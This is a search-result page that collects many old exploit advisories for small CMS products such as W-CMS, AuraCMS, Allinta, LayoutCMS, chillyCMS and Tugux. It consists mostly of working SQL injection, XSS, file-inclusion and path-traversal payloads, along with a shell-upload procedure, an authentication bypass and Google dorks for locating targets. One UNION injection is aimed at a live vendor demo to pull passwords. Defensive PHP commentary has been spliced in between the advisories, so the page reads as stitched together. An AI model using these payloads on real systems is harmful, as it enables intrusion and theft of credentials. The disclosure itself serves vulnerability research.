exploits cms balitbang
Search result for 'exploits cms balitbang'
th3.g4m3_0v3r/W-CMS 2.01 Cross Site Scripting / Directory Traversal
# Exploit Title: W-Cms Multiple Vulnerability
# Date: 2012-01-09
# Author: th3.g4m3_0v3r
# Site: http://w-cms.info/
# Software Link: http://code.google.com/p/wcms/
# Dork: intext:"Powered by w-CMS"
# Version : [2.01]
# Tested on: Window 7
# Yogesh Kashyap, shubneet goel, w4rl0ck.d0wn, Chip, VzAcnY, Razzy, Sayan, Jaggi Panu, Darkgt
# www.h4ck3r.in, www.root-team.com, www.hackingmind.com, www.hackingcrackingtricks.in
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.h4ck3r.in www.root-team.com www.hackingmind.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
W-CMS cross site scripting
Vulnerable Link
http://localhost/index.php?bid=1&COMMENT=1 "XSS"
http://localhost/?p=3"XSS"
http://localhost/?bid=5&p=1"XSS"
http://localhost/?p=3<FORM action="Default.asp?PageId=-1" method=POST id=searchFORM name=searchFORM style="margin:0;padding:0"><INPUT type="hidden" value="" name="txtSEARCH"></FORM>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
directory traversal attacks
This script is possibly vulnerable to directory traversal attacks
http://localhost/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://localhost/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Greetz To : 1337day.com ~ exploit-db.com ~ hackforums.net
W-CMS version 2.01 suffers from cross site scripting and directory traversal vulnerabilities.
Arianom/AuraCMS 1.62 pfd.php SQL Injection
-----------------------------------------------------------------------
AuraCMS (pfd.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : Arianom (arianom@indonesiancoder.com)
Homepage : http://indonesiancoder.com
Vendor : http://www.auracms.org/
Software : AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html
Version : 1.62
Date : November 22, 2010
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
http://localhost/pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7
II. Reference
-----------------------------------------------------------------------
AuraCMS 1.62 (stat.php) Remote Code Execution Exploit : http://www.exploit-db.com/exploits/4933/
III. Vendor patch
-----------------------------------------------------------------------
Currently manufacturers do not provide patches or upgrades.
IV. Credits
-----------------------------------------------------------------------
Allahu Akbar
INDONESIAN CODER ~ Kill-9 Crew ~ MC Crew
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ N4ck0 ~ Yurakha ~ aN93l1c ~ Mboys ~ Contrex ~ n4KuLa_ k4L0ng666 ~ Xr0b0t ~ kido ~ t3ll0 ~ cimpli ~ Pathloader
V. Poem
-----------------------------------------------------------------------
We are ordinary people who love to learn. We like to study anything, including things that other people find strange or foreign. We are here only to share, not to compete.
Indonesian Coder Family
AuraCMS version 1.62 suffers from a remote SQL injection vulnerability in pfd.php.
High-Tech Bridge SA/Exponent CMS 2.0.0pr2 Local File Inclusion
=============================
Vulnerability ID: HTB22718
Reference: http://www.htbridge.ch/advisory/lfi_in_exponent_cms_1.html
Product: Exponent CMS
Vendor: http://www.exponentcms.org/ ( http://www.exponentcms.org/ )
Vulnerable Version: 2.0.0pr2
Vendor Notification: 22 November 2010
Vulnerability Type: Local File Inclusion
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "/rss.php" script to properly sanitize user-supplied input in module variable.
The following PoC is available:
http://exponent/rss.php?module=../../../../../../../etc/passwd%00
=============================
Vulnerability ID: HTB22717
Reference: http://www.htbridge.ch/advisory/lfi_in_exponent_cms.html
Product: Exponent CMS
Vendor: http://www.exponentcms.org/ ( http://www.exponentcms.org/ )
Vulnerable Version: 2.0.0pr2
Vendor Notification: 22 November 2010
Vulnerability Type: Local File Inclusion
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "/podcast.php" script to properly sanitize user-supplied input in module variable.
The following PoC is available:
http://exponent/podcast.php?module=../../../../../../../etc/passwd%00
Exponent CMS version 2.0.0pr2 suffers from multiple local file inclusion vulnerabilities.
High-Tech Bridge SA/Injader CMS 2.4.4 Cross Site Scripting / SQL Injection
==================================
Vulnerability ID: HTB22743
Reference: http://www.htbridge.ch/advisory/sql_injection_in_injader_cms_1.html
Product: Injader CMS
Vendor: http://www.injader.com/ ( http://www.injader.com/ )
Vulnerable Version: 2.4.4
Vendor Notification: 07 December 2010
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "IJ-Login" variable from cookie.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
The following PoC is available:
GET /index.php HTTP/1.1
Cookie: IJ-Login=123'SQL_CODE_HERE
==================================
Vulnerability ID: HTB22744
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_injader_cms.html
Product: Injader CMS
Vendor: http://www.injader.com/ ( http://www.injader.com/ )
Vulnerable Version: 2.4.4
Vendor Notification: 07 December 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "/login.php" script to properly sanitize user-supplied input in "Referer" variable.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
The following PoC is available:
GET /login.php HTTP/1.1
Referer: "><script>alert('XSS');</script>
Injader CMS version 2.4.4 suffers from cross site scripting and remote SQL injection vulnerabilities.
Stefan Schurtz/AdaptCMS 2.0.1 Cross Site Scripting / Bypass
Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities
Advisory ID: SSCHADV2011-018
Author: Stefan Schurtz
Affected Software: Successfully tested on AdaptCMS 2.0.1
Vendor URL: http://www.adaptcms.com/
Vendor Status: fixed
CVE-ID: -
==========================
Vulnerability Description:
==========================
AdaptCMS 2.0.1 is prone to multiple security vulnerabilities
==================
Technical Details:
==================
Cross-site Scripting
http://<target>/AdaptCMS/admin.php?view=</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script>
Authentication bypass / Information Disclosure
http://<target>/AdaptCMS/admin.php?view=/&view=settings
http://<target>/AdaptCMS/admin.php?view=/&view=users
http://<target>/AdaptCMS/admin.php?view=/&view=groups
http://<target>/AdaptCMS/admin.php?view=/&view=levels
http://<target>/AdaptCMS/admin.php?view=/&view=stats
=========
Solution:
=========
"Get the latest AdaptCMS Files" from the admin area
====================
Disclosure Timeline:
====================
24-Sep-2011 - informed developers
24-Sep-2011 - Release date of this security advisory
25-Sep-2011 - fixed by vendor
25-Sep-2011 - post on BugTraq
========
Credits:
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References:
===========
http://www.adaptcms.com/
http://www.insanevisions.com/article/293/News/AdaptCMS-201-Security-Hole
http://www.rul3z.de/advisories/SSCHADV2011-018.txt
AdaptCMS version 2.0.1 suffers from cross site scripting, information disclosure, and authentication bypass vulnerability.
High-Tech Bridge SA/Allinta CMS 22.07.2010 Cross Site Scripting / SQL Injection
=========================================
Vulnerability ID: HTB22528
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_allinta_cms.html
Product: Allinta CMS
Vendor: Allinta ( http://www.allinta.com/ )
Vulnerable Version: Current at 22.07.2010 and Probably Prior Versions
Vendor Notification: 26 July 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "/languageselect.asp" script to properly sanitize user-supplied input in multiple variables. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/languageselect.asp?lang_URL=Default.asp%3Flang%3D&ss=x%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&img=1
http://host/languageselect.asp?lang_URL=Default.asp%27};alert%28document.cookie%29;{a=%27%3Flang%3D&ss=x&img=1
=========================================
Vulnerability ID: HTB22529
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_allinta_cms_1.html
Product: Allinta CMS
Vendor: Allinta ( http://www.allinta.com/ )
Vulnerable Version: Current at 22.07.2010 and Probably Prior Versions
Vendor Notification: 26 July 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "faqAE.asp" script to properly sanitize user-supplied input in "i" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/path_to_admin/faqAE.asp?m=edit&i=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
=========================================
Vulnerability ID: HTB22530
Reference: http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_allinta_cms.html
Product: Allinta CMS
Vendor: Allinta ( http://www.allinta.com/ )
Vulnerable Version: Current at 22.07.2010 and Probably Prior Versions
Vendor Notification: 26 July 2010
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "contentAE.asp" script to properly sanitize user-supplied input in "i" variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
Attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/path_to_admin/contentAE.asp?m=edit&i=376+ANY_SQL_HERE
=========================================
Vulnerability ID: HTB22531
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_allinta_cms_2.html
Product: Allinta CMS
Vendor: Allinta
Vulnerable Version: Current at 22.07.2010 and Probably Prior Versions
Vendor Notification: 26 July 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "menuCodeAE.asp" script to properly sanitize user-supplied input in "i" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/path_to_admin/menuCodeAE.asp?m=edit&i=185%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
=========================================
Vulnerability ID: HTB22532
Reference: http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_allinta_cms_1.html
Product: Allinta CMS
Vendor: Allinta ( http://www.allinta.com/ )
Vulnerable Version: Current at 22.07.2010 and Probably Prior Versions
Vendor Notification: 26 July 2010
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "templatesAE.asp" script to properly sanitize user-supplied input in "i" variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
Attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/path_to_admin/templatesAE.asp?m=edit&i=1+ANY_SQL_HERE
Allinta CMS version 22.07.2010 suffers from cross site scripting and remote SQL injection vulnerabilities.
High-Tech Bridge SA/Free Simple CMS 1.0 Cross Site Scripting / Local File Inclusion
Vulnerability ID: HTB23010
Reference: http://www.htbridge.ch/advisory/multiple_xss_in_free_simple_cms.html
Product: Free Simple CMS
Vendor: Dustin Cowell Enterprises ( http://www.freesimplesoft.com/ )
Vulnerable Version: 1.0 and probably prior
Tested on: 1.0
Vendor Notification: 25 May 2011
Vulnerability Type: XSS (Cross Site Scripting), Local File Inclusion
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Free Simple CMS, which can be exploited to perform cross-site scripting attacks.
1) Input appended to the URL after index.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php/%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
2) Input passed via the GET "db_themes_background_color_page" parameter to /themes/default/index.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/themes/default/index.php?db_themes_background_color_page=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E
Successful exploitation of the vulnerabilities requires that "register_globals" is enabled.
3) Input passed via the GET "include" parameter to index.php (when GET "page" parameter is set to "login" and GET "request" parameter is set to "forgot_password") is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal sequences.
The following PoC code is available:
http://[host]/index.php?page=login&request=forgot_password&include=../../../../../../../../etc/passwd
Free Simple CMS version 1.0 suffers from cross site scripting and local file inclusion vulnerabilities.
LiquidWorm/Constructr CMS 3.03.0 Cross Site Scripting / SQL Injection
Constructr CMS 3.03 Multiple Remote Vulnerabilities (XSS/SQLi)
Vendor: phaziz interface design
Product web page: http://www.constructr-cms.org
Affected version: 3.03.0
Summary: ConstructrCMS is a new and fresh Content Management
System built with the Power of PHP and MySQL. The Backend is
mostly controlled by Ajax for a unique User Experience.
Desc: The CMS suffers from several vulnerabilities (SQL and XSS).
The sql issue can be triggered when the app tries to parse malicious
arguments to the 'page_id' in the /xmlOutput/constructrXmlOutput.content.xml.php
script with user input not validated. The result can be seen in the source
code of the page itself. The xss issue (GET) is thru 'user' and 'hash' parameter in
the /backend/login.php script.
-------------------------------------------------------------------
32: $PAGE_ID = $_REQUEST['page_id'];
...
40: $select_content = $conContent -> query("
41: SELECT *
42: FROM $DB_TABLE_CONSTRUCTR_CONTENT
43: WHERE page_id = '$PAGE_ID'
44: ORDER BY sort ASC
45: ")or die(mysql_error());
...
51: while ($all_content = $conContent -> fetch_array($select_content))
52: {
53: $id = $all_content['id'];
54: $page_id = $all_content['page_id'];
...
-------------------------------------------------------------------
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Advisory ID: ZSL-2011-5001
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5001.php
10.03.2011
PoC:
[SQL] http://constructr/xmlOutput/constructrXmlOutput.content.xml.php?page_id='[INJECT POINT];--";--
[XSS] http://constructr/backend/login.php?installed=101&no_user_rights=101&login_first_echo=101&already_logged_in=101&login_user_deactivated=101&login_failed=101&login_success=101&nosaltnpepper=101&user=101<script>alert(2)</script>&hash=101<script>alert(2)</script>
Constructr CMS version 3.03 suffers from cross site scripting and remote SQL injection vulnerabilities.
R3d-D3v!L/LayoutCMS 1.0 SQL Injection / Cross Site Scripting
+===================================================================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
\ \_ _ _ _/ /___ / / __ | |) / | | / /
\_ _ _ _/ /___ / / | __ || / | | / /
_______\ \_ _ \ \2_0_0_9 | \ | | / /____
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
[?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
[?] LayoutCMS 1.0 (SQL/XSS) Multiple Remote Vulnerabilities
==============================================================================
[?] My home: [ http://sec-r1z.com ]
[?] Script: [ LayoutCMS 1.0 ]
[?] Language: [ PHP ]
[?] Vendor [http://layoutcms.com/]
[?] Founder: [ ./Red-D3v1L ]
[?] Gr44tz to: [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
[?] Fuck To : [ Zombie_KsA << big big big L4m3r ]
########################################################################
===[ Exploit SQL ]===
[»]Exploit : [Path]/preview.php?id=[inject c0dE]
[»]dem0: http://layoutcms.com/demo/preview.php?id=-1+union+select+1,2,concat%28pass,0x3e,uname%29,4,5,6,7,8,9,10+from+layout_demo.users
[~] look For ThE Title xD
==============================================================================
===[ Exploit XSS ]===
[»]Exploit : [Path]/preview.php?id=[XSS Vuln]
[»]dem0: http://layoutcms.com/demo/preview.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
==============================================================================
#sEc-r1z.com Str1kEz y0u !
LayoutCMS version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
Abhi M Balakrishnan/chillyCMS 1.3.0 Shell Upload / Access Bypass
# Exploit Title: chillyCMS 1.3.0 Multiple Vulnerabilities
# Google Dork: "powered by chillyCMS"
# Date: 15 February 2013
# Exploit Author: Abhi M Balakrishnan
# Vendor Homepage: http://chillycms.bplaced.net/
# Software Link: http://chillycms.bplaced.net/chillyCMS/media/files/chillyCMS_full.zip
# Version: 1.3.0
# Tested on: uWAMP 2.1 (PHP 5.2.17, MySQL 5.5.9), Windows 8
# Video: http://www.youtube.com/watch?v=6B3rND9S75g
# Vulnerability
Failure to Restrict URL Access
chillyCMS uses 302 redirects to restrict access to the unauthorized pages.
# Exploit
Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/chillyCMS/
Step 2: Access http://localhost/chillyCMS/admin/
# Vulnerability
Arbitrary File Upload
chillyCMS/admin/design.site.php page extracts all uploaded ZIP files to chillyCMS/tmp directory
# Exploit
Step 1: Create a ZIP file of the files to be uploaded. Example: Compress shell.php to get shell.zip
Step 2: Upload shell.zip
Step 3: Access the shell at http://localhost/chillyCMS/tmp/shell.php
# History
11 March 2012 - Discovered vulnerability and exploit, contacted the vendor.
12 March 2012 - Vendor responds back, exchanges a few mails.
15 November 2012 - Vendor discontinues further development.
15 February 2013 - Published the vulnerabilities and exploits to the public.
# How to reproduce
The latest download from the website was not working on fresh install. An earlier version (1.1.3) has been installed and all the PHP files, except config.php, have been replaced with new files.
chillyCMS version 1.3.0 suffers from URL restriction bypass and remote shell upload vulnerabilities.
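The first issue in the advisory above, access control enforced only by a 302 redirect, comes down to one missing statement: if the script sends the Location header but keeps executing, a client that ignores the redirect receives the protected page body anyway. As an added illustration (not chillyCMS code; the session keys, role value and login path are assumptions), the weak check and the corrected check side by side:

```php
<?php
declare(strict_types=1);

// Added example, not chillyCMS code. Session keys, the 'admin' role value
// and the /login.php path are assumptions for the illustration.

/** Authorisation decision, taken server-side from the session only. */
function is_admin(): bool
{
    return isset($_SESSION['user_id'], $_SESSION['role'])
        && $_SESSION['role'] === 'admin';
}

/**
 * Weak pattern: the redirect is sent, but execution continues, so the
 * protected content below is still generated and sent in the 302 body.
 * A client that does not follow redirects simply reads it.
 */
function require_admin_weak(): void
{
    if (!is_admin()) {
        header('Location: /login.php');
        // missing: exit;
    }
}

/**
 * Corrected pattern: the response ends here. Nothing after this call runs
 * for an unauthorised request, whatever the client does with the 302.
 */
function require_admin(): void
{
    if (!is_admin()) {
        header('Location: /login.php', true, 302);
        exit;
    }
}

// Every admin/*.php script starts with the check before any output.
session_start();
require_admin();
echo 'Protected admin content';
```

The redirect is only a convenience for browsers; the security property is that the authorisation check terminates the response. The same applies to any other "redirect and return" guard, including ones that set a 403 status instead of a Location header.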
Stefan Schurtz/Yet Another CMS 1.0 Cross Site Scripting / SQL Injection
Advisory: Yet Another CMS 1.0 SQL Injection & XSS vulnerabilities
Advisory ID: SSCHADV2011-031
Author: Stefan Schurtz
Affected Software: Successfully tested on Yet Another CMS 1.0
Vendor URL: http://yetanothercms.codeplex.com/
Vendor Status: informed
==========================
Vulnerability Description:
==========================
Yet Another CMS 1.0 is prone to multiple SQL Injection and XSS vulnerabilities
==================
Technical Details:
==================
// search.php
$result_set = get_search_result_set($_POST['pattern']);
// includes/functions.php
function get_search_result_set($pattern, $public = true) {
global $connection;
$query = "SELECT
id,
subject_id,
menu_name,
position,
visible,
content,
CONCAT('... ', SUBSTRING(content, LOCATE('" . $pattern . "',content), 200), ' ...') as fragment
FROM
pages
WHERE
content like '%" . $pattern . "%'";
// index.php
<?php find_selected_page(); ?>
// includes/functions.php
function find_selected_page() {
global $sel_subject;
global $sel_page;
if (isset($_GET['subj'])) {
$sel_subject = get_subject_by_id($_GET['subj']);
$sel_page = get_default_page($sel_subject['id']);
} elseif (isset($_GET['page'])) {
$sel_subject = NULL;
$sel_page = get_page_by_id($_GET['page']);
} else {
$sel_subject = NULL;
$sel_page = NULL;
}
}
function get_page_by_id($page_id) {
global $connection;
$query = "SELECT * ";
$query .= "FROM pages ";
$query .= "WHERE id=" . $page_id ." ";
$query .= "LIMIT 1";
==================
Exploit
==================
SQL Injection
http://<target>/index.php?page=[sql injection]
http://<target>/search.php -> 'search field' -> [sql injection]
XSS
http://<target>/search.php -> 'search field' -> '"</script><script>alert(document.cookie)</script>
http://<target>/index.php?page='</script><script>alert(document.cookie)</script>
====================
Disclosure Timeline:
====================
18-Oct-2011 - informed developers
========
Credits:
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References:
===========
http://yetanothercms.codeplex.com/
http://yetanothercms.codeplex.com/workitem/643
http://www.rul3z.de/advisories/SSCHADV2011-031.txt
Yet Another CMS version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
eidelweiss/Tugux CMS 1.2 Cross Site Scripting / Blind SQL Injection
===================================================================
Tugux CMS 1.2 Multiple vulnerability (BLIND sql & xss)
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: BLind SQL Injection
Download link: http://www.tugux.com/uploads/47/tugux_cms.rar
Author: eidelweiss
contact: admin[at]eidelweiss[dot]info
Home: www.eidelweiss.info
References: http://eidelweiss-advisories.blogspot.com/2011/07/tugux-cms-12-multiple-vulnerability.html
===================================================================
Vuln c0de on page_text.php
<?php
session_start();
require_once "scripts/connect_to_mysql.php";
if (isset($_GET['pid'])){
$pageid=$_GET['pid'];
//------------------------------------------------
$sqlCommand="SELECT lastmodified FROM pages WHERE id='$pageid' LIMIT 1";
$query=mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row=mysqli_fetch_array($query)) {
$date = $row["lastmodified"];
}
mysqli_free_result($query);
//------------------------------------------------
//------------------------------------------------
$sqlCommand = "SELECT admin FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row = mysqli_fetch_array($query)){
$admin = $row["admin"];
}
mysqli_free_result($query);
//------------------------------------------------
//------------------------------------------------
$sqlCommand = "SELECT pagebody FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row = mysqli_fetch_array($query)){
$body = $row["pagebody"];
}
mysqli_free_result($query);
}
//------------------------------------------------
if (isset($_GET['nid'])){
$nid=$_GET['nid'];
$sql=mysqli_query($myConnection,"SELECT title, date, admin, news FROM news WHERE id='$nid'") or die (mysqli_error($myConnection));
===================================================================
exploit & p0c
[!] page_text.php?nid=[valid nid]
[!] page_text.php?pid=[valid pid]
Example p0c
[!] http://server/page_text.php?nid=12 <= True
[!] http://server/page_text.php?nid=-12 <= False
[!] http://server/page_text.php?pid=51 <= True
[!] http://server/page_text.php?pid=-51 <= False
[+] http://server:3306 <= download the file, save it and open it with C++ or WordPad; it will show the MySQL version
[!] sample: http://server:3306 result : 5.0.92-community (uses version 5.0.92) :D
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: xss
Download link: http://www.tugux.com/uploads/47/tugux_cms.rar
Author: eidelweiss
contact: admin[at]eidelweiss[dot]info
Home: www.eidelweiss.info
====================================================================
comments.php file is prone to a persistent XSS attack
Go to
http://server/comments.php
and put or type this xss c0de into the command box
';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))</SCRIPT><script>alert(document.cookie)</script>
then the site will direct you to
http://server/latest.php?nid=
and there you go.. xss will pop up
p0c:
http://server/comments.php
or
http://server/path/comments.php
official site: http://www.tugux.com/comments.php
Gratz:
- YOGYACARDERLINK , DEVILZC0DE , etc
- Nofia Fitri (unyu²), whitehat, note, petimati, psycothic_girl, viska agasi (dudutzkuw), wenkhairu, etc (too tiring to type them all)
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
Hacking is Art
===================================================================
==========================| -=[ E0F ]=- |==========================
Tugux CMS version 1.2 suffers from cross site scripting and remote blind SQL injection vulnerabilities.
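The Constructr CMS (page_id), Yet Another CMS (page id and search pattern) and Tugux CMS (pid, nid) excerpts above all build SQL by concatenating a request value into the query string. As an added example, not code from any of those projects, the same two query shapes written with mysqli prepared statements: a lookup by numeric id, and a free-text LIKE search. The table and column names follow the Yet Another CMS excerpt; the connection parameters are placeholders.

```php
<?php
declare(strict_types=1);

// Added example, not code from Constructr CMS, Yet Another CMS or Tugux CMS.
// Table/column names follow the Yet Another CMS excerpt; credentials are placeholders.
// get_result()/fetch_all() need the mysqlnd driver, which is the default build.

/**
 * Fetch one page by numeric id. Returns null when the id is not a positive
 * integer (type validation) or when no row matches.
 */
function get_page_by_id(mysqli $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                       // "1 OR 1=1", "-1 UNION ..." never reach the database
    }
    $stmt = $db->prepare('SELECT id, menu_name, content FROM pages WHERE id = ? LIMIT 1');
    $stmt->bind_param('i', $id);           // bound as an integer, never spliced into the SQL text
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

/**
 * Free-text search. Binding the pattern stops injection; escaping % and _
 * stops a user turning the search term into a match-everything wildcard.
 */
function search_pages(mysqli $db, string $pattern): array
{
    // Use '!' as the LIKE escape character so no backslash double-escaping is involved.
    $escaped = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $pattern);
    $like = '%' . $escaped . '%';
    $stmt = $db->prepare(
        "SELECT id, menu_name,
                CONCAT('... ', SUBSTRING(content, LOCATE(?, content), 200), ' ...') AS fragment
           FROM pages
          WHERE content LIKE ? ESCAPE '!'"
    );
    // LOCATE() takes the literal term; LIKE takes the wildcard-escaped form.
    $stmt->bind_param('ss', $pattern, $like);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Usage in a request handler. Exceptions replace the "or die(mysql_error())"
// pattern, which leaks query text and driver errors to the visitor.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$db = new mysqli('localhost', 'cms_user', 'PLACEHOLDER', 'cms');
$db->set_charset('utf8mb4');

$page    = get_page_by_id($db, $_GET['page'] ?? '');
$results = search_pages($db, $_POST['pattern'] ?? '');
```

With the parameter bound, the quote-breaking payloads in the PoCs above are stored or compared as data; the only remaining behavioural difference an observer could see is the LIKE match itself, which the escaping keeps to the literal term.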
NLSecurity/CompactCMS 1.4.1 Cross Site Scripting / File Disclosure
# Exploit Title: CompactCMS 1.4.1 Multiple Vulnerabilities
# Google Dork: intext:"Maintained with CompactCMS.nl" intitle:"Print: *"
# Date: 17-12-2010
# Author: NLSecurity
# Software Link: http://files.compactcms.nl/stable/
# Version: CompactCMS 1.4.1
# Credits: http://www.nlsecurity.org/
# Extra: irc.6667.eu #main
Description:
CompactCMS 1.4.1 has multiple XSS and File Disclosure vulnerabilities. These file disclosures will
appear if the users have access to view open directories.
--- File Disclosures ---
/admin/includes/modules/backup-restore/
/admin/includes/modules/backup-restore/content-owners/
